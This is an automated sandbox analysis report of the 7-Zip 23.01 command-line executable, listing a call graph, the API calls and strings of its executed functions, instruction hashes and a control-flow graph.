34439->34440 34441 fa82b0 34439->34441 34440->34092 34487 f724c4 fputc 34440->34487 34441->34440 34442 f739ac 6 API calls 34441->34442 34443 f739f0 malloc _CxxThrowException memmove free _CxxThrowException 34441->34443 34446 f739ac 6 API calls 34441->34446 34939 f85f6c 10 API calls 34441->34939 34940 f73920 _CxxThrowException 34441->34940 34442->34441 34443->34441 34447 fa8303 free 34446->34447 34447->34441 34449 fb2c5e 34448->34449 34460 fb2c7a 34448->34460 34450 fb2c62 free 34449->34450 34450->34450 34450->34460 34451 fb2dda 34451->34105 34451->34112 34453 fb2ddc free 34453->34451 34455 fb2dea free 34455->34451 34456 fb2df8 free 34456->34451 34457 fb5a44 5 API calls 34457->34460 34458 f72350 2 API calls 34458->34460 34459 fb2d9a memmove 34461 fb2db2 free 34459->34461 34460->34451 34460->34453 34460->34455 34460->34456 34460->34457 34460->34458 34460->34459 34460->34461 34941 f7ab0c malloc _CxxThrowException memmove 34460->34941 34942 faa948 16 API calls 34460->34942 34461->34451 34461->34460 34462->34122 34463->34124 34464->34127 34465->34131 34466->34138 34467->34155 34468->34169 34469->34183 34471 fc73ae 34470->34471 34474 fc73ca 34471->34474 34943 fc7e40 34471->34943 34472 fc7409 free 34473 fc744b free 34472->34473 34475 fc741e 34472->34475 34478 fc745e free 34473->34478 34474->34472 34476 fc73f4 free free 34474->34476 34475->34473 34476->34474 34481 f72db8 2 API calls 34480->34481 34482 f727b0 34481->34482 34483 f735b8 3 API calls 34482->34483 34484 f727be 34483->34484 34485 f724e4 10 API calls 34484->34485 34486 f727d1 fputs free free 34485->34486 34486->34072 34487->34094 34488->34104 34490 f73614 34489->34490 34490->34490 34491 f73280 2 API calls 34490->34491 34492 f73628 34491->34492 34492->34108 34493->34112 34494->34120 34495->34114 34497->34124 34499->34159 34502->34217 34503->34217 34504->34231 34506->34235 34507->34239 34510->34215 34512->34193 34515 f84467 34514->34515 34516 f73600 2 API calls 34515->34516 34521 f844ca 34515->34521 34517 f844ab 34516->34517 34595 f82ee0 7 API calls 34517->34595 34518 f845f4 34518->34284 34518->34287 34520 f84599 34599 f986a8 7 API calls 34520->34599 34521->34518 34521->34520 34528 f84597 34521->34528 34596 f841f4 112 API calls 34521->34596 34597 f840ec 14 API calls 34521->34597 34598 f82ee0 7 API calls 34521->34598 34522 f844bf free 34522->34521 34524 f845ad _CxxThrowException 34524->34528 34528->34518 34600 f986a8 7 API calls 34528->34600 34530 f845e2 _CxxThrowException 34530->34518 34532 f75793 34531->34532 34536 f7578b 34531->34536 34533 f757ca 34532->34533 34535 f757b5 free free 34532->34535 34601 f751a8 malloc _CxxThrowException _CxxThrowException memmove free 34533->34601 34535->34532 34540 f8492c 34536->34540 34537 f72350 2 API calls 34539 f757e0 34537->34539 34538 f736a8 3 API calls 34538->34539 34539->34536 34539->34537 34539->34538 34541 f84a0a 34540->34541 34543 f84956 34540->34543 34541->34301 34541->34311 34542 f7354c malloc _CxxThrowException 34542->34543 34543->34541 34543->34542 34544 f73798 4 API calls 34543->34544 34545 f73730 4 API calls 34543->34545 34602 f83e50 6 API calls 34543->34602 34544->34543 34545->34543 34547 f849e0 free free 34547->34541 34547->34543 34549 f76b09 34548->34549 34550 f76b38 34548->34550 34549->34550 34603 f764dc 49 API calls 34549->34603 34551 f76b70 34550->34551 34553 f76b5b free free 34550->34553 34554 f9c90c 34551->34554 34553->34550 34555 f85a48 34554->34555 34557 f9c91e 34554->34557 34574 f7646c 14 API calls 34555->34574 34557->34555 34604 f9c694 34557->34604 34558->34249 34559->34253 34560->34266 34561->34267 34562->34270 34563->34271 34564->34279 34565->34276 34566->34285 34567->34292 34568->34324 34569->34332 34570->34330 34571->34335 34572->34340 34573->34341 34574->34358 34575->34365 34576->34360 34577->34306 34578->34307 34580 f83d49 34579->34580 34581 f83d51 34579->34581 34580->34326 34580->34331 34582 f83d92 34581->34582 34584 f83d73 free free free 34581->34584 34643 f751a8 malloc _CxxThrowException _CxxThrowException memmove free 34582->34643 34584->34581 34585 f72350 2 API calls 34587 f83da6 34585->34587 34586 f736a8 malloc _CxxThrowException memmove 34586->34587 34587->34580 34587->34585 34587->34586 34588->34326 34589->34342 34590->34353 34591->34354 34592->34352 34593->34317 34594->34315 34595->34522 34596->34521 34597->34521 34598->34521 34599->34524 34600->34530 34601->34539 34602->34547 34603->34549 34622 f998b8 34604->34622 34607 f998b8 108 API calls 34611 f9c6c5 34607->34611 34608 f9c8c3 34608->34557 34610 f734d0 4 API calls 34613 f9c85d 34610->34613 34619 f9c722 34611->34619 34626 f98580 34611->34626 34613->34608 34613->34610 34615 f9c694 119 API calls 34613->34615 34642 f9826c malloc _CxxThrowException memmove 34613->34642 34617 f9c8a2 free free 34615->34617 34616 f761fc 7 API calls 34616->34619 34617->34608 34617->34613 34618 f9c7eb memmove 34618->34619 34619->34613 34619->34616 34619->34618 34640 f728e8 CharUpperW CharUpperW 34619->34640 34641 f76048 6 API calls 34619->34641 34623 f99925 34622->34623 34625 f998d0 34622->34625 34623->34607 34624 f98580 108 API calls 34624->34625 34625->34623 34625->34624 34627 f9865a 34626->34627 34628 f985a0 34626->34628 34627->34611 34628->34627 34629 f7354c 2 API calls 34628->34629 34630 f985ea 34629->34630 34631 f734d0 4 API calls 34630->34631 34632 f985fb 34631->34632 34633 f9860a free free 34632->34633 34634 f98621 34632->34634 34633->34627 34635 f788ec 102 API calls 34634->34635 34636 f98633 34635->34636 34637 f98645 free free 34636->34637 34638 f73798 4 API calls 34636->34638 34637->34627 34639 f98644 34638->34639 34639->34637 34640->34619 34642->34613 34643->34587 34806 f76c8c 34644->34806 34647 f73504 4 API calls 34648 fa70ea 34647->34648 34813 f792d4 34648->34813 34650 fa70ff 34651 fa715d 34650->34651 34652 f73504 4 API calls 34650->34652 34654 fa716f free 34651->34654 34655 fa717d 34651->34655 34653 fa7119 34652->34653 34656 f792d4 103 API calls 34653->34656 34654->34655 34657 fa7183 free 34655->34657 34658 fa7191 34655->34658 34659 fa712e 34656->34659 34657->34658 34660 fa71a1 34658->34660 34661 fa7197 free 34658->34661 34659->34651 34664 f73504 4 API calls 34659->34664 34662 fa72d3 34660->34662 34663 f7354c 2 API calls 34660->34663 34661->34660 34665 f736a8 3 API calls 34662->34665 34666 fa71b4 34663->34666 34667 fa7148 34664->34667 34668 fa72e0 free 34665->34668 34818 fa6f74 112 API calls 34666->34818 34670 f792d4 103 API calls 34667->34670 34671 fa72ee 34668->34671 34670->34651 34671->34380 34672 fa71d0 34673 fa71ff 34672->34673 34674 fa71d4 34672->34674 34819 fa6f74 112 API calls 34673->34819 34675 f736a8 3 API calls 34674->34675 34677 fa71e1 free free 34675->34677 34677->34671 34678 fa721a 34679 fa7249 34678->34679 34680 fa721e 34678->34680 34820 fa6f74 112 API calls 34679->34820 34682 f736a8 3 API calls 34680->34682 34684 fa722b free free 34682->34684 34683 fa725d 34685 fa7289 34683->34685 34686 fa7261 34683->34686 34684->34671 34821 fa6f74 112 API calls 34685->34821 34687 f736a8 3 API calls 34686->34687 34689 fa726e free free 34687->34689 34689->34671 34690 fa729d 34691 fa72c9 free 34690->34691 34692 fa72a1 34690->34692 34691->34662 34693 f736a8 3 API calls 34692->34693 34694 fa72ae free free 34693->34694 34694->34671 34696 fa93de 34695->34696 34697 fa9479 34696->34697 34894 f76bac FreeLibrary LoadLibraryExW 34696->34894 34699 fb5a44 5 API calls 34697->34699 34701 fa9482 34699->34701 34700 fa940d 34702 fa946c 34700->34702 34703 fa9411 GetLastError 34700->34703 34704 f72350 2 API calls 34701->34704 34705 f76b80 FreeLibrary 34702->34705 34706 fa9447 34703->34706 34707 fa9420 34703->34707 34708 fa948c 34704->34708 34705->34697 34709 f76b80 FreeLibrary 34706->34709 34895 fa84d8 malloc _CxxThrowException _CxxThrowException memmove free 34707->34895 34711 fa94a1 34708->34711 34897 fa7c28 malloc _CxxThrowException 34708->34897 34729 fa9465 free 34709->34729 34715 f73798 4 API calls 34711->34715 34712 fa9429 34714 f73798 4 API calls 34712->34714 34716 fa9437 34714->34716 34717 fa94d3 34715->34717 34896 f72e68 malloc _CxxThrowException free 34716->34896 34831 f76bf0 34717->34831 34721 fa94ea 34836 fa76d4 GetProcAddress 34721->34836 34722 fa9607 34901 fa8b28 8 API calls 34722->34901 34726 fa9522 34730 fa9538 GetProcAddress 34726->34730 34731 fa9550 34726->34731 34727 fa94f6 34898 fa84d8 malloc _CxxThrowException _CxxThrowException memmove free 34727->34898 34729->34386 34729->34405 34730->34731 34735 fa954e 34730->34735 34736 fa9559 GetProcAddress 34731->34736 34737 fa957c GetProcAddress 34731->34737 34732 fa94ff 34738 f73798 4 API calls 34732->34738 34733 fa9640 free 34734 f76b80 FreeLibrary 34733->34734 34739 fa9652 free 34734->34739 34735->34731 34736->34737 34740 fa956f 34736->34740 34845 fa88b0 GetProcAddress GetProcAddress GetProcAddress 34737->34845 34742 fa950d 34738->34742 34739->34729 34740->34737 34899 f72e68 malloc _CxxThrowException free 34742->34899 34743 fa951d 34743->34729 34743->34733 34746 fa95d3 34746->34743 34900 fa84d8 malloc _CxxThrowException _CxxThrowException memmove free 34746->34900 34749 fa95f3 34750 f73798 4 API calls 34749->34750 34750->34743 34906 f7921c 34751->34906 34753 fa971f 34754 fa9723 free 34753->34754 34755 f736a8 3 API calls 34753->34755 34754->34396 34754->34405 34756 fa9737 34755->34756 34757 fa974c 34756->34757 34912 f732b0 _CxxThrowException 34756->34912 34758 f7354c 2 API calls 34757->34758 34760 fa977c 34758->34760 34913 f787cc malloc _CxxThrowException _CxxThrowException free memmove 34760->34913 34762 fa978c 34763 f7354c 2 API calls 34762->34763 34764 fa97a0 34763->34764 34914 f78858 50 API calls 34764->34914 34766 fa97b8 34767 fa9828 34766->34767 34769 fa9834 free free 34766->34769 34774 f734d0 4 API calls 34766->34774 34775 fa93b8 88 API calls 34766->34775 34915 f78858 50 API calls 34766->34915 34916 fa8b28 8 API calls 34767->34916 34771 f782ec FindClose 34769->34771 34770 fa9833 34770->34769 34773 fa9853 free 34771->34773 34773->34754 34774->34766 34776 fa97fa free 34775->34776 34776->34766 34777 fa9862 free free 34776->34777 34778 f782ec FindClose 34777->34778 34779 fa9881 free 34778->34779 34779->34754 34781 fa179b 34780->34781 34782 fa17c8 free 34780->34782 34781->34782 34785 fa17b3 free free 34781->34785 34783 fa17dc 34782->34783 34784 fa1812 free 34782->34784 34783->34784 34786 fa17f4 free free free 34783->34786 34785->34781 34786->34783 34917 f74040 34787->34917 34790 f74040 10 API calls 34799 fa85e6 34790->34799 34791 fa868d 34792 fa86c6 free 34791->34792 34796 fa86b2 free free 34791->34796 34794 fa870a free 34792->34794 34795 fa86dd 34792->34795 34793 f7354c malloc _CxxThrowException 34793->34799 34794->34395 34795->34794 34797 fa86f6 free free 34795->34797 34796->34791 34797->34795 34798 f73798 4 API calls 34798->34799 34799->34791 34799->34793 34799->34798 34800 f73798 4 API calls 34799->34800 34936 fa8374 6 API calls 34799->34936 34802 fa8636 wcscmp 34800->34802 34802->34799 34803 fa8668 free free 34803->34791 34803->34799 34804->34409 34805->34409 34807 f7354c 2 API calls 34806->34807 34808 f76caf 34807->34808 34822 f76c28 GetModuleFileNameW 34808->34822 34810 f76cbf 34811 f76cf9 34810->34811 34826 f738a8 34810->34826 34811->34647 34814 f7354c 2 API calls 34813->34814 34815 f7931b 34814->34815 34816 f788ec 102 API calls 34815->34816 34817 f7932c free 34816->34817 34817->34650 34818->34672 34819->34678 34820->34683 34821->34690 34823 f76c7a 34822->34823 34824 f76c69 34822->34824 34823->34810 34824->34823 34825 f73730 4 API calls 34824->34825 34825->34823 34827 f738be 34826->34827 34828 f738eb 34827->34828 34829 f72350 2 API calls 34827->34829 34828->34811 34830 f738da free 34829->34830 34830->34828 34832 f76b80 FreeLibrary 34831->34832 34833 f76c03 34832->34833 34834 f76c0d LoadLibraryExW 34833->34834 34835 f76c09 34833->34835 34834->34835 34835->34721 34835->34722 34837 fa7742 34836->34837 34839 fa7706 34836->34839 34837->34726 34837->34727 34838 fa772d 34840 f7be6c VariantClear 34838->34840 34839->34838 34841 fa7738 34839->34841 34844 fa7750 34840->34844 34842 f7be6c VariantClear 34841->34842 34842->34837 34843 f7be6c VariantClear 34843->34837 34844->34843 34846 fa8920 GetProcAddress 34845->34846 34847 fa8a81 GetProcAddress 34845->34847 34853 fa8941 34846->34853 34848 fa8afa 34847->34848 34852 fa8a97 34847->34852 34849 fa8a78 34848->34849 34849->34743 34849->34746 34859 fa8cbc GetProcAddress GetProcAddress 34849->34859 34850 fa73c4 VariantClear SysStringByteLen 34850->34853 34851 fb5a44 5 API calls 34851->34852 34852->34848 34852->34849 34852->34851 34853->34847 34853->34849 34853->34850 34854 f7be6c VariantClear 34853->34854 34855 fa8a6e 34853->34855 34902 fa7ddc malloc _CxxThrowException _CxxThrowException memmove free 34853->34902 34854->34853 34856 f7be6c VariantClear 34855->34856 34856->34849 34858 fa8a38 memmove 34858->34847 34858->34853 34860 fa8d50 GetProcAddress 34859->34860 34861 fa8d27 GetProcAddress 34859->34861 34862 fa8d4b 34860->34862 34890 fa8d6f 34860->34890 34863 fa8d3c 34861->34863 34861->34890 34864 fa91df 34862->34864 34863->34862 34863->34890 34864->34746 34865 f7354c malloc _CxxThrowException 34865->34890 34866 fa91e4 34867 fa1784 7 API calls 34866->34867 34867->34864 34868 fa8eb3 SysStringByteLen 34869 fa91e9 34868->34869 34868->34890 34871 f7be6c VariantClear 34869->34871 34870 f7bf00 VariantClear 34870->34890 34871->34866 34872 fa1784 7 API calls 34872->34890 34873 f7be6c VariantClear 34873->34890 34874 fa91fe free free 34874->34866 34875 fa760c malloc _CxxThrowException SysStringLen free VariantClear 34875->34890 34876 fa9219 free free 34876->34866 34877 fa8580 21 API calls 34877->34890 34878 fa9234 free free 34878->34866 34879 fa7544 VariantClear 34879->34890 34880 fa748c VariantClear 34880->34890 34881 fa924f free free 34881->34866 34882 fa7eb0 7 API calls 34882->34890 34883 fa9267 free free free 34883->34866 34884 fb5a44 malloc _CxxThrowException _CxxThrowException memmove free 34884->34890 34886 fa928a free free free 34886->34866 34888 fa92ad free free free 34888->34866 34889 f72350 2 API calls 34889->34890 34890->34864 34890->34865 34890->34866 34890->34868 34890->34870 34890->34872 34890->34873 34890->34874 34890->34875 34890->34876 34890->34877 34890->34878 34890->34879 34890->34880 34890->34881 34890->34882 34890->34883 34890->34884 34890->34886 34890->34888 34890->34889 34892 fa9191 free free free 34890->34892 34903 f9fe74 malloc _CxxThrowException memmove 34890->34903 34904 fa8798 9 API calls 34890->34904 34905 fa18a8 malloc _CxxThrowException memmove memmove 34890->34905 34893 fa1784 7 API calls 34892->34893 34893->34890 34894->34700 34895->34712 34896->34706 34897->34711 34898->34732 34899->34743 34900->34749 34901->34743 34902->34858 34903->34890 34904->34890 34905->34890 34907 f7354c 2 API calls 34906->34907 34908 f7927e 34907->34908 34909 f788ec 102 API calls 34908->34909 34910 f7928f free 34909->34910 34910->34753 34913->34762 34914->34766 34915->34766 34916->34770 34918 f74097 34917->34918 34919 f7406b 34917->34919 34920 f741b7 34918->34920 34921 f7354c 2 API calls 34918->34921 34919->34918 34922 f74082 free free 34919->34922 34920->34790 34929 f740b0 34921->34929 34922->34919 34923 f74161 34924 f741af free 34923->34924 34925 fb5a44 5 API calls 34923->34925 34924->34920 34928 f74178 34925->34928 34927 fb5a44 5 API calls 34927->34929 34930 f72350 2 API calls 34928->34930 34929->34923 34929->34927 34931 f72350 2 API calls 34929->34931 34935 f736a8 3 API calls 34929->34935 34937 f732b0 _CxxThrowException 34929->34937 34932 f74182 34930->34932 34931->34929 34933 f7419c 34932->34933 34934 f736a8 3 API calls 34932->34934 34933->34924 34934->34933 34935->34929 34936->34803 34938->34437 34939->34441 34940->34441 34941->34460 34942->34460 34944 fc7e61 34943->34944 34945 fc7e52 34943->34945 34944->34474 34948 fc7cc0 free free 34945->34948 34949 fc7cfe 34948->34949 34950 fc7d2a free 34948->34950 34949->34950 34956 f7ef28 34961 f79900 34956->34961 34959 f7ef58 GetLastError 34960 f7ef65 34959->34960 34962 f7991c 34961->34962 34964 f7994f 34962->34964 34965 f798b8 WriteFile 34962->34965 34964->34959 34964->34960 34965->34962

                              Executed Functions

                              Function 00FC8806 Relevance: 153.2, APIs: 74, Strings: 13, Instructions: 907COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FC8815
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              • GetStdHandle.KERNEL32 ref: 00FC88BE
                              • GetConsoleScreenBufferInfo.KERNELBASE ref: 00FC88CF
                              • _CxxThrowException.MSVCRT ref: 00FC8A08
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputcfputs
                              • String ID: 7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20$ || $ : $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$Libs:$Unsupported archive type$offset=$wudn
                              • API String ID: 3360184521-3863618374
                              • Opcode ID: fb6856b30bb5f270ac6beb8af17b74fb33742cc34dfaa6e04be398e479e18e2d
                              • Instruction ID: 8b2f5445aedcff1c55479abcbfef25f6034f7727d9e04efd1340da8f2f664ca2
                              • Opcode Fuzzy Hash: fb6856b30bb5f270ac6beb8af17b74fb33742cc34dfaa6e04be398e479e18e2d
                              • Instruction Fuzzy Hash: D082C776304A8286DB74EF25E9913AE7362F785B94F40802BDA8E47B59CF3CC549E740
                              Function 00F9AB24 Relevance: 111.1, APIs: 88, Instructions: 1120COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow$ErrorLastmemmove$malloc
                              • String ID:
                              • API String ID: 707025802-0
                              • Opcode ID: ceaf24fd47fc8341da6eaf501670e25404b62931f2dc33c50ccb912c4fbabdc3
                              • Instruction ID: 565be3d4d1412486d5bb61958a6da9ff0474801451d94da0f913c8a56a2858eb
                              • Opcode Fuzzy Hash: ceaf24fd47fc8341da6eaf501670e25404b62931f2dc33c50ccb912c4fbabdc3
                              • Instruction Fuzzy Hash: 7A928F32A18BC486DB60DB26E9903AEB361F7C5B90F548022DB8D57B19DF7DC851EB01
                              Function 00F9DD64 Relevance: 92.4, APIs: 59, Strings: 2, Instructions: 860COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ErrorLastmemset
                              • String ID: Cannot find archive file$The item is a directory
                              • API String ID: 4217778428-1569138187
                              • Opcode ID: 1e3f51e84f81622fbf7d17e567aceea866ec7258f54f7e8f05af78af9bbf3dca
                              • Instruction ID: d2b7e037da2c2ee93cc986c4250b25a197243aa8c32058b08c59c9d49c6cd195
                              • Opcode Fuzzy Hash: 1e3f51e84f81622fbf7d17e567aceea866ec7258f54f7e8f05af78af9bbf3dca
                              • Instruction Fuzzy Hash: DD727833209BC586DBB0EB26E88429EB365F7C9B90F554122DA8E47B29DF3CC455DB01
                              Function 00F9D078 Relevance: 84.7, APIs: 55, Strings: 1, Instructions: 666COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • Cannot create output directory, xrefs: 00F9D7A2
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrowmemmove$malloc
                              • String ID: Cannot create output directory
                              • API String ID: 159934335-1181934277
                              • Opcode ID: 2f10caa28412ac4f7e1d2c8bdc0615199bc42ce7b530f4a6929b9d5e33afb12b
                              • Instruction ID: 49e5535194581c9077558fead95c241cc89778969e7976961e6d0883eba070e7
                              • Opcode Fuzzy Hash: 2f10caa28412ac4f7e1d2c8bdc0615199bc42ce7b530f4a6929b9d5e33afb12b
                              • Instruction Fuzzy Hash: 8142C222609BC592DF70EB25E8903AEB361F3C5B94FA44112DA8D47B19CF3DC865EB01
                              Function 00F85134 Relevance: 63.8, APIs: 22, Strings: 14, Instructions: 809COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • Only one archive can be created with rename command, xrefs: 00F85DF7
                              • Cannot use absolute pathnames for this command, xrefs: 00F858E8
                              • The command must be specified, xrefs: 00F8515E
                              • Unsupported -spf:, xrefs: 00F852DF
                              • Unsupported -spm:, xrefs: 00F8552D
                              • Cannot find archive name, xrefs: 00F8558E
                              • Archive name cannot by empty, xrefs: 00F855D4
                              • Unsupported command:, xrefs: 00F851C5
                              • Incorrect number of benchmark iterations, xrefs: 00F85E5F
                              • I won't write data and program's messages to same stream, xrefs: 00F85AA3, 00F85D98
                              • Unsupported -snz:, xrefs: 00F85953
                              • I won't write compressed data to a terminal, xrefs: 00F85D57
                              • stdout mode and email mode cannot be combined, xrefs: 00F85D26
                              • -ai switch is not supported for this command, xrefs: 00F85BB4
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ExceptionThrow$wcscmp$free
                              • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect number of benchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -snz:$Unsupported -spf:$Unsupported -spm:$Unsupported command:$stdout mode and email mode cannot be combined
                              • API String ID: 225321437-2319225105
                              • Opcode ID: 3202f9a66226af083b18468dc7675a34c977d3d8c8771206bff99535c8c8a207
                              • Instruction ID: 42f2358ecdc86b69f5e449efc2347ca17119e774bc3d8aaa1f20fcaa62114474
                              • Opcode Fuzzy Hash: 3202f9a66226af083b18468dc7675a34c977d3d8c8771206bff99535c8c8a207
                              • Instruction Fuzzy Hash: 63820677704AC1A7DB24DF28D5903EDBBA1F395B84F888026C78947B25CB38D5A9E701
                              Function 00FAD9EE Relevance: 55.6, APIs: 44, Instructions: 648COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 70b7bcc3ea81bab64ced7b7cb59cd13f36b8e48cd5f8edd397eb3d07964e819d
                              • Instruction ID: 3d9fe214a3311faf37a5a560abff1f1d980dc52e3a8a5a0fe6470e5268599ed8
                              • Opcode Fuzzy Hash: 70b7bcc3ea81bab64ced7b7cb59cd13f36b8e48cd5f8edd397eb3d07964e819d
                              • Instruction Fuzzy Hash: DD42047B609BC486CBA0EB35E4506AF7764F386B88F859002DA8E47B15DF3CC499E711
                              Function 00F7798C Relevance: 40.7, APIs: 27, Instructions: 239COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2172 f7798c-f779a8 call f786c8 2174 f779ad-f779b0 2172->2174 2175 f779b2-f779b4 2174->2175 2176 f779bd-f779c7 call f7ae24 2174->2176 2175->2176 2177 f779b6-f779b8 2175->2177 2181 f779d0-f779fa call f7af80 call f735b8 call f73b28 2176->2181 2182 f779c9-f779cb 2176->2182 2179 f77d13-f77d22 2177->2179 2189 f77a1f-f77a39 call f736a8 2181->2189 2190 f779fc-f77a05 2181->2190 2182->2179 2197 f77a3e-f77a4a call f7b1e4 2189->2197 2190->2189 2191 f77a07-f77a09 2190->2191 2193 f77a10-f77a19 2191->2193 2194 f77a0b 2191->2194 2193->2189 2196 f77cbb-f77cc8 free 2194->2196 2196->2179 2200 f77a6e-f77a70 2197->2200 2201 f77a4c-f77a59 CreateDirectoryW 2197->2201 2204 f77a76-f77a96 call f7354c call f7b8b0 2200->2204 2205 f77b44-f77b4d GetLastError 2200->2205 2202 f77a5f-f77a68 GetLastError 2201->2202 2203 f77c2a-f77c2e 2201->2203 2202->2200 2202->2205 2209 f77c93-f77cab free * 2 2203->2209 2210 f77c30-f77c43 call f7ab3c 2203->2210 2227 f77a9c-f77aab CreateDirectoryW 2204->2227 2228 f77b3a-f77b3f free 2204->2228 2207 f77b4f-f77b7f call f78290 call f7354c call f788ec 2205->2207 2208 f77bae-f77bb7 GetLastError 2205->2208 2248 f77b81-f77b8e free 2207->2248 2249 f77b90-f77ba5 free 2207->2249 2214 f77cad-f77cb8 free 2208->2214 2215 f77bbd-f77bcb call f73b28 2208->2215 2209->2179 2222 f77c45-f77c49 2210->2222 2223 f77c4b 2210->2223 2214->2196 2225 f77bd1-f77bd3 2215->2225 2226 f77cfc-f77d11 free * 2 2215->2226 2230 f77c4f-f77c6d call f737f0 call f773b0 2222->2230 2223->2230 2225->2226 2231 f77bd9-f77be0 2225->2231 2226->2179 2232 f77ab1-f77aba GetLastError 2227->2232 2233 f77c20-f77c25 free 2227->2233 2228->2205 2254 f77c77-f77c8e free * 2 2230->2254 2255 f77c6f-f77c73 2230->2255 2237 f77bf6-f77bfc 2231->2237 2238 f77be2-f77be6 2231->2238 2239 f77abc-f77ac6 free 2232->2239 2240 f77acb-f77af7 call f78290 call f7354c call f788ec 2232->2240 2233->2203 2245 f77ce3-f77cfa free * 2 2237->2245 2246 f77c02-f77c06 2237->2246 2243 f77bec-f77bf0 2238->2243 2244 f77cca-f77ce1 free * 2 2238->2244 2239->2208 2261 f77b16-f77b38 free * 2 2240->2261 2262 f77af9-f77b11 free * 2 2240->2262 2243->2237 2243->2244 2244->2179 2245->2179 2246->2197 2251 f77c0c-f77c1b 2246->2251 2248->2208 2253 f77baa-f77bac 2249->2253 2251->2197 2253->2203 2253->2208 2254->2179 2255->2210 2257 f77c75 2255->2257 2257->2209 2261->2253 2262->2208
                              APIs
                                • Part of subcall function 00F786C8: GetFileAttributesW.KERNELBASE ref: 00F786EA
                                • Part of subcall function 00F786C8: GetFileAttributesW.KERNEL32 ref: 00F78721
                                • Part of subcall function 00F786C8: free.MSVCRT ref: 00F7872E
                              • free.MSVCRT ref: 00F77CC0
                              Memory Dump Source
